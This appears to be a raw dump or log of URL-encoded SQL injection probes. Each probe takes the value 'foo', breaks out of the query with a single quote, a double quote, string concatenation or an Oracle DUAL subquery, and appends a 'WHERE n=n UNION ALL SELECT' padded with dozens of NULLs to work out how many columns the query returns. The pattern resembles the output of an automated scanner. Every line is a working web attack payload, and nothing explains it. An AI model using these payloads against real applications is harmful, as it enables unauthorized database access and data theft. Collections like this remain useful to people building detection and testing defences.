foo%27%20WHERE%202655%3D2655%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%208745%3D8745%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%208180%3D8180%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%201482%3D1482%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%206398%3D6398%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%207302%3D7302%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%201587%3D1587%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%201655%3D1655%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%208723%3D8723%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%205013%3D5013%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%205417%3D5417%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%205159%3D5159%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%208926%3D8926%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%202474%3D2474%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%201499%3D1499%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%209281%3D9281%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%205949%3D5949%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%202252%3D2252%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%201809%3D1809%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%206038%3D6038%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%206558%3D6558%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%204310%3D4310%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%204946%3D4946%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27SbTs%27%20FROM%20DUAL%20WHERE%205024%3D5024%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27tolR%27%20FROM%20DUAL%20WHERE%202625%3D2625%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27dlls%27%20FROM%20DUAL%20WHERE%208445%3D8445%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27ieAl%27%20FROM%20DUAL%20WHERE%208427%3D8427%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27JGqN%27%20FROM%20DUAL%20WHERE%209700%3D9700%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27qibr%27%20FROM%20DUAL%20WHERE%202308%3D2308%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27UkTj%27%20FROM%20DUAL%20WHERE%207348%3D7348%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27OgjY%27%20FROM%20DUAL%20WHERE%204149%3D4149%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27EiFU%27%20FROM%20DUAL%20WHERE%209221%3D9221%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27Hraa%27%20FROM%20DUAL%20WHERE%204545%3D4545%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27JXCE%27%20WHERE%204090%3D4090%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27CxHo%27%20WHERE%203028%3D3028%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27luen%27%20WHERE%205817%3D5817%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27WaPA%27%20WHERE%209119%3D9119%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27hQOQ%27%20WHERE%201371%3D1371%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27EPPj%27%20WHERE%206847%3D6847%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27IAyG%27%20WHERE%208608%3D8608%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27WUGy%27%20WHERE%208964%3D8964%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27bYTZ%27%20WHERE%202805%3D2805%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27rtRh%27%20WHERE%209326%3D9326%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20nmpm%20WHERE%201136%3D1136%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20kNLg%20WHERE%201808%3D1808%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%2B%28SELECT%20aIFu%20WHERE%208200%3D8200%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 